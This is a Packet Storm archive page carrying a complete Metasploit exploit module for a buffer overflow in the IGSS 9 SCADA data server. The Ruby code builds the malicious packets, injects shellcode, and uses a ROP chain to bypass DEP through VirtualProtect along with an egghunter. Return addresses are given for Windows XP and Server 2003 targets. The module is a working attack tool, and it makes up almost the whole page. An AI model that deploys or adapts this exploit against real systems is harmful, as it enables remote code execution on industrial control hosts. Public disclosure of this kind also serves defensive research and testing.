what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow

7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
Posted Jun 9, 2011
Authored by Luigi Auriemma, sinn3r | Site metasploit.com

This Metasploit module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command, a buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report, which results arbitrary code execution under the context of the user. The attack is carried out in three stages. The first stage sends the final payload to IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command so the process can find a valid ID for the Rename command. The last stage then triggers the vulnerability with the Rename command, and uses an egghunter to search for the shellcode that we sent in stage 1. The use of egghunter appears to be necessary due to the small buffer size, which cannot even contain our ROP chain and the final payload.

tags | exploit, overflow, arbitrary, shellcode, code execution
SHA-256 | 159bcc6e1d0a284b89e943dc6ab734d6c2d4c9cfd17f99602199371978ca7d42

7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow

Change Mirror Download
##
# $Id: igss9_igssdataserver_rename.rb 12886 2011-06-09 06:04:04Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Egghunter

def initialize(info={})
super(update_info(info,
'Name' => "7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying
a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,
a buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report,
which results arbitrary code execution under the context of the user.

The attack is carried out in three stages. The first stage sends the final payload to
IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command
so the process can find a valid ID for the Rename command. The last stage then triggers
the vulnerability with the Rename command, and uses an egghunter to search for the
shellcode that we sent in stage 1. The use of egghunter appears to be necessary due to
the small buffer size, which cannot even contain our ROP chain and the final payload.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 12886 $",
'Author' =>
[
'Luigi Auriemma <aluigi[at]autistici.org>', #Initial discovery, poc
'sinn3r', #Metasploit
],
'References' =>
[
['URL', 'http://aluigi.altervista.org/adv/igss_5-adv.txt'],
],
'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'DefaultOptions' =>
{
'ExitFunction' => "seh",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3',
{
'Ret' => 0x1B0938B8, #ADD ESP,910; RETN 10 MSJET40.dll
'RopOffset' => 68, #Offset to the ROP chain
'Offset' => 500, #Offset to SE Handler (stack pivot)
'Max' => 8000, #Max buffer size
}
],
[
'Windows Server 2003 SP2/R2 SP2',
{
'Ret' => 0x1B093622, #ADD ESP,910; RETN 10 MSJET40.dll
'RopOffset' => 76, #Offset to the ROP chain
'Offset' => 500, #Offset to SE Handler (stack pivot)
'Max' => 8000, #Max buffer size
}
]
],
'Privileged' => false,
'DisclosureDate' => "Mar 24 2011"))

register_options(
[
Opt::RPORT(12401, false),
]
)
end

#We need to send the Add command first, so that IGSSdataServer.exe can find the 'ID' before
#triggering the vulnerable code path we're trying to hit. Without this, we'll just hit
#"FAILED renameDicRec. ID not found %s" (logText function).
def add_template(id)
buf = ''
buf << "\x9b\x00" #Packet size
buf << "\x01\x00\x34\x12"
buf << "\x07" #Opcode
buf << "\x00\x00\x00\x00\x00\x00\x00"
buf << "\x01" #Flag
buf << "\x00\x00\x00"
buf << "\x04" #Command (add)
buf << "\x00\x00\x00"
buf << id
buf << "\x00"
buf << "\x00"*31
buf << "\x78"
buf << "\x00"*63
buf << "\x78"
buf << "\x00"*28

connect

sock.put(buf)

print_status("Sending ADD command to #{datastore['RHOST']}")
res = sock.recv(1024)

disconnect

return res
end

#Since we don't have a lot of space on the stack when we trigger the overflow, we send a
#separate packet that contains our final payload, and let egghunter look for it later in memory
def inject_payload(my_payload)

buf = ''
buf << "\x01\x00\x34\x12"
buf << "\x0D" #Opcode
buf << "\x00\x00\x00\x00\x00\x00\x00"
buf << "\x01" #Flag
buf << "\x00\x00\x00"
buf << "\x01" #Command (ListAll)
buf << "\x00\x00\x00"
buf << my_payload
buf << Rex::Text.rand_text_alpha(1024-my_payload.length)
buf << "\x00"*130

#Packet size
buf_size = [buf.length + 2].pack('v')
buf = buf_size + buf

connect

sock.put(buf)
print_status("Injecting payload in memory to #{datastore['RHOST']}")

disconnect
end

#It's definitely junk
def junk
return rand_text(4).unpack("L")[0].to_i
end

def sploit_rename(id)
#Egghunter is used because we don't really have a lot of space on the stack
#to fit the ROP chain and a larger payload
eggoptions =
{
:checksum => true,
:eggtag => 'W00T',
:depmethod => 'virtualprotect',
:depreg => 'esi'
}

hunter, p = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

#depreg (Put VirtualProtect in ESI)
esi = "\x81\xf6\x16\x1b\x5f\x5e" #XOR ESI, 0x5E5F1B16
esi << "\x3e\x8b\x36" #MOV ESI, DWORD PTR DS:[ESI]

#Put depreg alignment
hunter = esi + hunter

#Send final payload first, and let egghunter look for it
inject_payload(p)

#Max ROP chain size we can use is 406 bytes
rop = [
:xchg_esp_ebp,
#0x59ABA24B, #PUSH ESP # POP EBP # RETN [dbghelp.dll]
junk,
junk,
junk,
junk,
0x1B76A59E, #XCHG EAX,EBP # RETN [dao360.dll]
0x1B8260DD, #ADD EAX,20 # RETN [msjtes40.dll]
:add_eax_100,
#0x1B09FA13, #ADD EAX,100 # RETN 0C [MSJET40.DLL]

#VirtualProtect Argument ([0x540214])
:xchg_eax_ecx,
junk,
junk,
junk,
:pop_eax,
0x3BABFD6D, #0x3BABFD6D xor 0x3BFFFF79
0x1B7802A3, #XOR EAX,3BFFFF79 # RETN [dao360.dll]
0x1b73f3bd, #MOV EAX,DWORD PTR DS:[EAX] # RETN [dao360.dll]
:xchg_eax_ecx,
0x1B829E75, #MOV DWORD PTR DS:[EAX],ECX # RETN [msjtes40.dll]
0x1B74C50A, #ADD EAX,4 # RETN [dao360.dll]

#Retn:
:xchg_eax_esi,
#0x1B0505C1, #PUSH EAX # POP ESI # RETN 4 [MSJET40.DLL]
0x1B8260DD, #ADD EAX,20 # RETN [Module : msjtes40.dll]
junk,
0x1B8260DD, #ADD EAX,20 # RETN [msjtes40.dll]
0x1B8260DD, #ADD EAX,20 # RETN [msjtes40.dll]
0x1B8260DD, #ADD EAX,20 # RETN [msjtes40.dll]
:xchg_eax_ecx,
:mov_eax_esi_pop_esi,
#0x1B03AD44, #MOV EAX,ESI # POP ESI # RETN [MSJET40.DLL]
0x5E0B1902, #:depreg initial value to xor
0x1B829E75, #MOV DWORD PTR DS:[EAX],ECX # RETN [msjtes40.dll]
0x1B74C50A, #ADD EAX,4 # RETN [dao360.dll]

#Shellcode:
0x1B829E75, #MOV DWORD PTR DS:[EAX],ECX # RETN [msjtes40.dll]
0x1B74C50A, #ADD EAX,4 # RETN [dao360.dll]

#Size (100 bytes -- enough for egghunter)
:xchg_eax_ecx,
:pop_eax,
:size_xor,
0x1B7802A3, #XOR EAX,3BFFFF79 # RETN [dao360.dll]
:xchg_eax_ecx,
0x1B829E75, #MOV DWORD PTR DS:[EAX],ECX # RETN [msjtes40.dll]
0x1B74C50A, #ADD EAX,4 # RETN [dao360.dll]

#newProtect (0x40):
:xchg_eax_ecx,
:pop_eax,
0x3BFFFF39, #0x3BFFFF39 xor 0x3BFFFF79
0x1B7802A3, #XOR EAX,3BFFFF79 # RETN [dao360.dll]
:xchg_eax_ecx,
0x1B829E75, #MOV DWORD PTR DS:[EAX],ECX # RETN [msjtes40.dll]
0x1B74C50A, #ADD EAX,4 # RETN [dao360.dll]

#oldProtect
0x1B731395, #POP ECX # RETN [dao360.dll]
0x1B82B410, #.data section (WR) in msjtes40.dll
0x1B829E75, #MOV DWORD PTR DS:[EAX],ECX # RETN [msjtes40.dll]

#Align the rewind part
0x1B829E86, # ADD EAX,0C # RETN [msjtes40.dll]

#Rewind
:rewind,

#Execute
0x1B72A833, #XCHG EAX,ESP # RETN [dao360.dll]
]

#OS specific gadgets
rop.map! do |gadget|
if gadget == :xchg_esp_ebp
(target.name =~ /xp/i) ? 0x59ABA24B : 0x6D5E2223
elsif gadget == :add_eax_100
(target.name =~ /xp/i) ? 0x1B09FA13 : 0x1B09F6F3
elsif gadget == :xchg_eax_esi
(target.name =~ /xp/i) ? 0x1B0505C1 : 0x1B051B71
elsif gadget == :xchg_eax_ecx
(target.name =~ /xp/i) ? 0x1B02708C : 0x1B02B28D
elsif gadget == :mov_eax_esi_pop_esi
(target.name =~ /xp/i) ? 0x1B03AD44 : 0x1B110735
elsif gadget == :pop_eax
(target.name =~ /xp/i) ? 0x1B0C65B6 : 0x1B0c6169
elsif gadget == :size_xor
(target.name =~ /xp/i) ? 0x3BFFFF01 : 0x3BFFFF1D
elsif gadget == :rewind
(target.name =~ /xp/i) ? 0x1B03D70A : 0x1B03C741
else
gadget
end
end

rop = rop.pack('V*')

sploit = ''
sploit << Rex::Text.rand_text_alpha(target['RopOffset'])
sploit << rop
sploit << Rex::Text.rand_text_alpha(target['Offset']-sploit.length)
sploit << [target.ret].pack('V') #Pivot
sploit << make_nops(12) #Padding
sploit << hunter
sploit << Rex::Text.rand_text_alpha(target['Max']-sploit.length)

#Create the packet with our naughty payload
pkt = "\x00\x04" #Funky size causes overflow
pkt << "\x01\x00\x34\x12"
pkt << "\x07" #Opcode
pkt << "\x00\x00\x00\x00\x00\x00\x00"
pkt << "\x02" #Flag
pkt << "\x00\x00\x00"
pkt << "\x02" #Command
pkt << "\x00\x00\x00"
pkt << id
pkt << "\x00"
pkt << sploit

connect

print_status("Sending malicious request to #{datastore['RHOST']}")
sock.put(pkt)

handler

#egghunter takes a few seconds, wait a bit before disconnect
select(nil, nil, nil, 3)
disconnect
end

def exploit
id = Rex::Text.rand_text_alpha(8)

res = add_template(id)
if res !~ /Report/i
print_error("Failed to add template:#{res}")
return
end

sploit_rename(id)
end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close